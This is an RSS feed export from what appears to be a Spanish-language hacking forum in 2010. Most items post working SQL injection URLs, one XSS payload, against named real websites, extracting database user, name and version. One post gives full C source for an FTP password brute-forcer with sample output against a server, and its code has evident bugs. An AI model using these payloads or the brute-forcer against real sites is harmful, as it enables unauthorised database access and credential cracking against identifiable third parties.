<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title> </title>
<description></description><link>https://foro.undersecurity.net/index.php</link><lastBuildDate>Thu, 09 Sep 2010 09:08:53 -0400</lastBuildDate>
<generator>Phorum 5.2.15a</generator>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7966,7966#msg-7966</guid>
<title>[XSS] www.ensenada.net (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7966,7966#msg-7966</link><description><![CDATA[XSS = http://www.ensenada.net/noticias/nota.php?id=18151'&lt;&lt;script&gt;alert(&quot;HXH&quot;);//&lt;&lt;/script&gt;]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Wed, 08 Sep 2010 23:24:12 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7965,7965#msg-7965</guid>
<title>[SQLI MYSQL] www.riskcenter.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7965,7965#msg-7965</link><description><![CDATA[SQLI =<br />http://www.riskcenter.com/story.php?id=13432+and+1=0+union+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables<br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/22/2255acde4442bc0dd05da72c2109ab0e.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Wed, 08 Sep 2010 22:29:52 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7964,7964#msg-7964</guid>
<title>[SQLI MYSQL] www.informaticahispana.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7964,7964#msg-7964</link><description><![CDATA[SQLI =<br />http://www.informaticahispana.com/ver.php?id=5+and+1=0+union+select+concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,2,3,4+--+<br /><br /><br />IMG =<br /><br /><img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/fc/fc7421d254be7adb182896754e52d6b8.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Tue, 07 Sep 2010 22:37:48 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7963,7963#msg-7963</guid>
<title>[SQLI MYSQL] www.oktava-shop.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7963,7963#msg-7963</link><description><![CDATA[SQLI =<br />http://www.oktava-shop.com/view_prod.php?id=110+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14+--+<br /><br /><br />IMG =<br /><br /><img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/b4/b4020acb4cb11c6ed5443b030e990594.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Tue, 07 Sep 2010 22:34:34 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7962,7962#msg-7962</guid>
<title>[SQLI MYSQL] www.creadorescolombianos.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7962,7962#msg-7962</link><description><![CDATA[SQLi =<br />http://www.creadorescolombianos.com/contenido.php?id=52+and+1=0+union+select+1,2,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9<br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/df/df4dda6c4c6e3c28bdb60da2e6619856.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Tue, 07 Sep 2010 20:27:29 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?19,7957,7957#msg-7957</guid>
<title>FTP Bruter [C] (no replies)</title><link>https://foro.undersecurity.net/read.php?19,7957,7957#msg-7957</link><description><![CDATA[<center class="bbcode"> <b>B</b>rute <b>F</b>orce By X4cks </center><br /><br /><span style="color:red">* </span>Los datos que te mada el servidor los lee para el lado del ojete pero igual se entiende.<br /><span style="color:blue">* </span> Fue creado por mi<br /><span style="color:blue">* </span>Si no les gusta el nombre del programa , cagense<br /><span style="color:blue">* </span>Soy sincero =)<br /><pre class="c bbcode_geshi"><div class="head">Language: C</div><span class="co2">#include &lt;stdio.h&gt;</span>
<span class="co2">#include &lt;stdlib.h&gt;</span>
<span class="co2">#include &lt;string.h&gt;</span>
<span class="co2">#include &lt;unistd.h&gt;</span>
<span class="co2">#include &lt;sys/types.h&gt;</span>
<span class="co2">#include &lt;sys/socket.h&gt;</span>
<span class="co2">#include &lt;netinet/in.h&gt;</span>
<span class="co2">#include &lt;netdb.h&gt;</span>
<span class="co2">#include &lt;sys/stat.h&gt;</span>
<span class="kw4">char</span> cadena<span class="br0">&#91;</span><span class="nu0">100</span><span class="br0">&#93;</span><span class="sy0">;</span>
<span class="kw4">int</span> asd<span class="sy0">;</span>
<span class="kw4">int</span> i<span class="sy0">=</span><span class="nu0">1</span><span class="sy0">;</span>
<span class="kw4">struct</span> cracker <span class="br0">&#123;</span>
	<span class="kw4">char</span> host<span class="br0">&#91;</span><span class="nu0">256</span><span class="br0">&#93;</span><span class="sy0">;</span>
	<span class="kw4">char</span> peticiones<span class="br0">&#91;</span><span class="nu0">1024</span><span class="br0">&#93;</span><span class="sy0">;</span>
<span class="br0">&#125;</span>cracker<span class="sy0">;</span>
<span class="kw4">struct</span> attack <span class="br0">&#123;</span>
	<span class="kw4">char</span> host<span class="br0">&#91;</span><span class="nu0">256</span><span class="br0">&#93;</span><span class="sy0">;</span>
	<span class="kw4">char</span> peticion1<span class="br0">&#91;</span><span class="nu0">256</span><span class="br0">&#93;</span><span class="sy0">;</span>
	<span class="kw4">char</span> peticion2<span class="br0">&#91;</span><span class="nu0">256</span><span class="br0">&#93;</span><span class="sy0">;</span>
	<span class="kw4">char</span> peticion3<span class="br0">&#91;</span><span class="nu0">256</span><span class="br0">&#93;</span><span class="sy0">;</span>
<span class="br0">&#125;</span>attack<span class="sy0">;</span>
<span class="kw4">int</span> main <span class="br0">&#40;</span><span class="kw4">int</span> argc<span class="sy0">,</span> <span class="kw4">char</span> <span class="sy0">*</span>argv<span class="br0">&#91;</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="br0">&#123;</span>
<span class="kw4">struct</span> hostent <span class="sy0">*</span>ad<span class="sy0">;</span>
<span class="kw4">struct</span> sockaddr_in serv<span class="sy0">;</span>
<span class="kw4">char</span> buffer<span class="br0">&#91;</span><span class="nu0">8000</span><span class="br0">&#93;</span><span class="sy0">;</span>
<span class="kw4">int</span> bytes_read<span class="sy0">,</span> s1<span class="sy0">;</span>
<span class="kw4">int</span> i<span class="sy0">=</span><span class="nu0">0</span><span class="sy0">;</span>
bzero<span class="br0">&#40;</span><span class="sy0">&amp;</span><span class="br0">&#40;</span>attack<span class="br0">&#41;</span><span class="sy0">,</span><span class="nu0">3</span><span class="br0">&#41;</span><span class="sy0">;</span>
bzero<span class="br0">&#40;</span><span class="sy0">&amp;</span><span class="br0">&#40;</span>cracker<span class="br0">&#41;</span><span class="sy0">,</span><span class="nu0">2</span><span class="br0">&#41;</span><span class="sy0">;</span>
&nbsp;
<span class="kw1">if</span> <span class="br0">&#40;</span>argc <span class="sy0">&lt;</span> <span class="nu0">4</span><span class="br0">&#41;</span> <span class="br0">&#123;</span>
	<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a><span class="br0">&#40;</span><span class="st0">&quot;%s &lt;host&gt;  &lt;diccionario&gt; &lt;user&gt;<span class="es1">\n</span>&quot;</span> <span class="sy0">,</span> argv<span class="br0">&#91;</span><span class="nu0">0</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="sy0">;</span>
	<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a><span class="br0">&#40;</span><span class="st0">&quot;AVISO: El diccionario debe estar creado.<span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
	exit<span class="br0">&#40;</span><span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
	<span class="br0">&#125;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span>
<span class="st0">&quot;<span class="es1">\n</span> ##   #### ###  ####   <span class="es1">\n</span>&quot;</span>
<span class="st0">&quot;#  #  ##   #  #  #       <span class="es1">\n</span>&quot;</span>
<span class="st0">&quot;####    ## #  #  ####  <span class="es1">\n</span>&quot;</span>
<span class="st0">&quot;#  #  ###  ###   #      <span class="es1">\n</span>&quot;</span>
<span class="st0">&quot;#####################&quot;</span>
<span class="st0">&quot;<span class="es1">\n</span>Si no te gusta el nombre ,cagate<span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
FILE <span class="sy0">*</span>diccionario <span class="sy0">=</span> fopen <span class="br0">&#40;</span>argv<span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span> <span class="sy0">,</span> <span class="st0">&quot;r&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
<span class="kw1">if</span> <span class="br0">&#40;</span>diccionario<span class="br0">&#41;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span>
<span class="st0">&quot;<span class="es1">\n</span><span class="es1">\n</span>#####################<span class="es1">\n</span>&quot;</span>
<span class="st0">&quot;#Fichero : Existente#<span class="es1">\n</span>&quot;</span>
<span class="st0">&quot;#####################<span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
<span class="kw1">else</span> <span class="br0">&#123;</span>
	<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;No existe el archivo ... madefaca!<span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
	<span class="kw1">return</span> <span class="nu0">1</span><span class="sy0">;</span>
<span class="br0">&#125;</span>
<span class="kw1">if</span> <span class="br0">&#40;</span><span class="kw4">sizeof</span><span class="br0">&#40;</span>argv<span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">&gt;=</span> <span class="nu0">256</span><span class="br0">&#41;</span><span class="br0">&#123;</span>
exit<span class="br0">&#40;</span><span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
<span class="br0">&#125;</span>
&nbsp;
memcpy<span class="br0">&#40;</span>attack.<span class="me1">host</span> <span class="sy0">,</span> argv<span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span> <span class="sy0">,</span> <span class="kw4">sizeof</span><span class="br0">&#40;</span>argv<span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">;</span>
ad<span class="sy0">=</span>gethostbyname<span class="br0">&#40;</span>argv<span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="sy0">;</span>
&nbsp;
<span class="kw1">if</span> <span class="br0">&#40;</span>ad <span class="sy0">==</span> NULL <span class="br0">&#41;</span> <span class="br0">&#123;</span>
	<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;[-]error gethostbyname<span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
	exit<span class="br0">&#40;</span><span class="sy0">-</span><span class="nu0">1</span><span class="br0">&#41;</span><span class="sy0">;</span>
	<span class="br0">&#125;</span>
&nbsp;
	s1 <span class="sy0">=</span> socket<span class="br0">&#40;</span>AF_INET<span class="sy0">,</span> SOCK_STREAM <span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
&nbsp;
	<span class="kw1">if</span> <span class="br0">&#40;</span>s1 <span class="sy0">==</span> <span class="sy0">-</span><span class="nu0">1</span><span class="br0">&#41;</span><span class="br0">&#123;</span>
	<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;[-]error al abrir el socket<span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
	<span class="br0">&#125;</span>
&nbsp;
serv.<span class="me1">sin_family</span><span class="sy0">=</span>AF_INET<span class="sy0">;</span>
serv.<span class="me1">sin_port</span><span class="sy0">=</span>htons<span class="br0">&#40;</span><span class="nu0">21</span><span class="br0">&#41;</span><span class="sy0">;</span>
serv.<span class="me1">sin_addr</span><span class="sy0">=</span> <span class="sy0">*</span><span class="br0">&#40;</span><span class="br0">&#40;</span><span class="kw4">struct</span> in_addr <span class="sy0">*</span><span class="br0">&#41;</span> ad<span class="sy0">-&gt;</span>h_addr<span class="br0">&#41;</span><span class="sy0">;</span>
bzero<span class="br0">&#40;</span><span class="sy0">&amp;</span><span class="br0">&#40;</span>serv.<span class="me1">sin_zero</span><span class="br0">&#41;</span><span class="sy0">,</span><span class="nu0">8</span><span class="br0">&#41;</span><span class="sy0">;</span>
&nbsp;
	<span class="kw1">if</span> <span class="br0">&#40;</span>connect<span class="br0">&#40;</span>s1<span class="sy0">,</span> <span class="br0">&#40;</span><span class="kw4">struct</span> sockaddr<span class="sy0">*</span><span class="br0">&#41;</span><span class="sy0">&amp;</span>serv<span class="sy0">,</span><span class="kw4">sizeof</span><span class="br0">&#40;</span><span class="kw4">struct</span> sockaddr<span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">==-</span><span class="nu0">1</span><span class="br0">&#41;</span> <span class="br0">&#123;</span>
	<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;error : conecting <span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
	<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;[+]Conectando ... <span class="es1">\n</span><span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
	memcpy<span class="br0">&#40;</span>cracker.<span class="me1">host</span> <span class="sy0">,</span> <span class="st0">&quot;Host: &quot;</span> <span class="sy0">,</span> <span class="nu0">6</span><span class="br0">&#41;</span><span class="sy0">;</span>
	<span class="br0">&#125;</span>
&nbsp;
<span class="br0">&#40;</span>cracker.<span class="me1">host</span> <span class="sy0">+</span> <span class="nu0">6</span> <span class="sy0">,</span> attack.<span class="me1">host</span> <span class="sy0">,</span> strlen<span class="br0">&#40;</span>attack.<span class="me1">host</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">;</span>
<span class="br0">&#40;</span>cracker.<span class="me1">host</span> <span class="sy0">+</span> strlen<span class="br0">&#40;</span>cracker.<span class="me1">host</span><span class="br0">&#41;</span><span class="sy0">,</span> <span class="st0">&quot;<span class="es1">\r</span><span class="es1">\n</span>&quot;</span><span class="sy0">,</span><span class="nu0">2</span><span class="br0">&#41;</span><span class="sy0">;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;Leyendo el diccionario : %s<span class="es1">\n</span><span class="es1">\n</span>&quot;</span> <span class="sy0">,</span> argv<span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="sy0">;</span>
<span class="kw1">while</span> <span class="br0">&#40;</span><span class="sy0">!</span>feof<span class="br0">&#40;</span>diccionario<span class="br0">&#41;</span><span class="br0">&#41;</span> <span class="br0">&#123;</span>
i<span class="sy0">=</span><span class="nu0">0</span><span class="sy0">;</span>
sprintf<span class="br0">&#40;</span>attack.<span class="me1">peticion1</span> <span class="sy0">,</span> <span class="st0">&quot;USER %s<span class="es1">\r</span><span class="es1">\n</span>&quot;</span><span class="sy0">,</span> argv<span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="sy0">;</span>
sprintf<span class="br0">&#40;</span>attack.<span class="me1">peticion2</span> <span class="sy0">,</span> <span class="st0">&quot;PASS %s<span class="es1">\r</span><span class="es1">\n</span>&quot;</span> <span class="sy0">,</span> fgets<span class="br0">&#40;</span>cadena <span class="sy0">,</span> <span class="nu0">100</span> <span class="sy0">,</span> diccionario<span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;<span class="es1">\n</span>!Comando !: %s&quot;</span><span class="sy0">,</span> attack.<span class="me1">peticion1</span><span class="br0">&#41;</span><span class="sy0">;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;<span class="es1">\n</span>!Comando !: %s&quot;</span><span class="sy0">,</span> attack.<span class="me1">peticion2</span><span class="br0">&#41;</span><span class="sy0">;</span>
sleep <span class="br0">&#40;</span><span class="nu0">10</span><span class="br0">&#41;</span><span class="sy0">;</span>
send <span class="br0">&#40;</span>s1<span class="sy0">,</span> attack.<span class="me1">peticion1</span> <span class="sy0">,</span> strlen<span class="br0">&#40;</span>attack.<span class="me1">peticion1</span><span class="br0">&#41;</span><span class="sy0">,</span><span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
send <span class="br0">&#40;</span>s1<span class="sy0">,</span> attack.<span class="me1">peticion2</span> <span class="sy0">,</span> strlen<span class="br0">&#40;</span>attack.<span class="me1">peticion2</span><span class="br0">&#41;</span><span class="sy0">,</span><span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
&nbsp;
bytes_read<span class="sy0">=</span>recv<span class="br0">&#40;</span>s1<span class="sy0">,</span> buffer <span class="sy0">,</span> <span class="kw4">sizeof</span><span class="br0">&#40;</span>buffer<span class="br0">&#41;</span> <span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;Server Message: %s&quot;</span> <span class="sy0">,</span> buffer<span class="br0">&#41;</span><span class="sy0">;</span>
bytes_read<span class="sy0">=</span>recv<span class="br0">&#40;</span>s1<span class="sy0">,</span> buffer <span class="sy0">,</span> <span class="kw4">sizeof</span><span class="br0">&#40;</span>buffer<span class="br0">&#41;</span> <span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;Server Message: %s&quot;</span> <span class="sy0">,</span> buffer<span class="br0">&#41;</span><span class="sy0">;</span>
bytes_read<span class="sy0">=</span>recv<span class="br0">&#40;</span>s1<span class="sy0">,</span> buffer <span class="sy0">,</span> <span class="kw4">sizeof</span><span class="br0">&#40;</span>buffer<span class="br0">&#41;</span> <span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;Server Mensaje: %s&quot;</span> <span class="sy0">,</span> buffer<span class="br0">&#41;</span><span class="sy0">;</span>
<span class="br0">&#125;</span>
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a> <span class="br0">&#40;</span><span class="st0">&quot;[*] Brute : Finish<span class="es1">\n</span>&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
close<span class="br0">&#40;</span>s1<span class="br0">&#41;</span><span class="sy0">;</span>
exit<span class="br0">&#40;</span><span class="nu0">0</span><span class="br0">&#41;</span><span class="sy0">;</span>
<span class="br0">&#125;</span></pre>
[/code]<br /><br />Aqui un ejemplo de como funciona<br /><pre class="bbcode">Comando : PASS aaa

Server Message: 220 (vsFTPd 2.0.1)
Server Message: 331 Please specify the password.
Server Mensaje: 530 Login incorrect.
 password.

Comando : USER admin

Comando : PASS abc

Server Message: 530 Please login with USER and PASS.
Server Message: 331 Please specify the password.
S.
Server Mensaje: 530 Login incorrect.
 password.
S.

Comando : USER admin

Comando : PASS academia

Server Message: 530 Please login with USER and PASS.
Server Message: 331 Please specify the password.
S.
Server Mensaje: 530 Login incorrect.
 password.
S.</pre>
Si no les gusta se pueden ir ...<br /><b>B</b>ytez]]></description>
<dc:creator>xacks</dc:creator>
<category>Programacion General</category><pubDate>Mon, 06 Sep 2010 09:12:18 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7956,7956#msg-7956</guid>
<title>[SQLI MYSQL] www.stracingfiber.es (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7956,7956#msg-7956</link><description><![CDATA[SQLI =<br />http://www.stracingfiber.es/producto.php?id=543+and+1=0+union+select+1,2,3,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12+--+]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 22:23:27 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7955,7955#msg-7955</guid>
<title>[SQLI MYSQL] www.naetura.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7955,7955#msg-7955</link><description><![CDATA[SQLI =<br />http://www.naetura.com/producto.php?id=16+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12<br /><br /><br />IMG =<br /><img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/85/85947f6bb79c5a68335743129f8ff4f5.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 21:59:59 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7954,7954#msg-7954</guid>
<title>[SQLI MYSQL] www.tissusargentina.com.ar (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7954,7954#msg-7954</link><description><![CDATA[SQLI =<br />http://www.tissusargentina.com.ar/producto.php?id=21+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29<br /><br /><br />IMG =<br /><img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/b2/b2ebbe017766ea1691e4c6b2d7f8378d.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 21:52:21 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7953,7953#msg-7953</guid>
<title>[SQLI MYSQL] www.24hcm.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7953,7953#msg-7953</link><description><![CDATA[SQLI = http://www.24hcm.com/es/noticies_int.php?id=19+and+1=0+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,10,11,12,13,14,15,16,17<br /><br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/31/311fafcf737a6e0057c97c2ac4c969c9.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 21:22:29 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7951,7951#msg-7951</guid>
<title>[SQLI MYSQL] www.documentamadrid.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7951,7951#msg-7951</link><description><![CDATA[http://www.documentamadrid.com/noticia_detalle.php?id=201+and+1=0+union+select+1,2,3,4,5,6,7,8,9]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 16:09:32 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7950,7950#msg-7950</guid>
<title>[SQLI MYSQL] www.clancbs.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7950,7950#msg-7950</link><description><![CDATA[SQLI = http://www.clancbs.com/downloads_seperate.php?id=547+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/8c/8cd20357d2339ea0815dc71bcfade375.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 16:00:10 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7949,7949#msg-7949</guid>
<title>[SQLI MYSQL] www.generacionpoliticasur.org (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7949,7949#msg-7949</link><description><![CDATA[SQLI = http://www.generacionpoliticasur.org/verdoc.php?id=57+and+1=0+union+select+concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 15:47:03 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7948,7948#msg-7948</guid>
<title>[SQLI MYSQL] www.edicioneslallave.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7948,7948#msg-7948</link><description><![CDATA[SQLI = http://www.edicioneslallave.com/libro.php?id=90+and+1=0+union+select+1,2,3,4,5,6,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,8,9,10,11,12,13,14<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/f3/f3deac487a18caf48c8b0f381ca84b46.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 15:39:14 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7947,7947#msg-7947</guid>
<title>[SQLI MYSQL] www.clubdelacepa.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7947,7947#msg-7947</link><description><![CDATA[SQLI = http://www.clubdelacepa.com/detalle_noticia.php?id=107+and+1=0+union+select+1,2,3,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/51/51cc1224813a9f2b2839c53d1d51f146.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 15:05:44 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7946,7946#msg-7946</guid>
<title>[SQLI MYSQL] www.ccp.si (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7946,7946#msg-7946</link><description><![CDATA[SQLI = http://www.ccp.si/english/izpis.php?id=873+and+1=0+union+select+1,2,3,4,5,6,7,8,9,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/7f/7f6e0d25c215a7d5d245dde48b3803b7.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 14:52:48 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?47,7945,7945#msg-7945</guid>
<title>[SQLI MYSQL] www.gabyvargas.com (no replies)</title><link>https://foro.undersecurity.net/read.php?47,7945,7945#msg-7945</link><description><![CDATA[SQLI = http://www.gabyvargas.com/libros.php?id=9+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7+--+<br /><br /><br />IMG = <img src="http://beta.thumbalizr.com/app/thumbs/?src=/thumbs/onl/source/69/69e920fbf7f2221332f2620769579235.png&amp;w=800&amp;q=0&amp;enc=" class="bbcode" border="0" />]]></description>
<dc:creator>Th3.xin0x</dc:creator>
<category>Full-D Website </category><pubDate>Sun, 05 Sep 2010 14:42:21 -0400</pubDate></item>
<item>
<guid>https://foro.undersecurity.net/read.php?76,7944,7944#msg-7944</guid>
<title>Ataques XSS con javascript (no replies)</title><link>https://foro.undersecurity.net/read.php?76,7944,7944#msg-7944</link><description><![CDATA[Ataques XSS con javascript por diversión y beneficio<br /><br /><br /><a href="http://4party.cuatrovientos.org/files/xssjavascript.pdf" target="_blank" rel="nofollow" >DOWNLOAD</a>]]></description>
<dc:creator>Th3.xin0x</dc:creator>
